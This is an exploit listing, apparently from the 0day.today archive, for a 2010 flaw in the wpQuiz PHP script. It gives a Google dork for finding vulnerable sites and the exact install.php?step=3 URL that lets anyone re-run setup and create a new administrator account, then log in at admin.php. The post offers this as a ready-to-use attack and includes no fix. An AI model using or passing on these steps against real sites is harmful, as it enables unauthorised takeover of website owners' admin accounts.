Powered by wpQuiz (install) Change Password Vulnerability

2010-09-22T00:00:00
ID 1337DAY-ID-14143
Type zdt
Reporter wlhaan Hacker
Modified 2010-09-22T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =========================================================
Powered by wpQuiz (install) Change Password Vulnerability
=========================================================

#####################################################
# [+] Author : wlhaan hacker #
# [+] Email : [email protected] #
# [+] Site : n/a #
# [+]  team wlhaan Hacker     #
# [+]  dork:""Powered by wpQuiz""
#####################################################
 
The exploit :

 http://localhost/path/install.php

and go to install  3

http://localhost/path/install.php?step=3

now add

Username:      
Password:     
E-mail:

After the piece login admin

http://localhost/path/admin.php
 

and good luck :D
 
Thanks to : shooq hacker ..



#  0day.today [2018-01-03]  #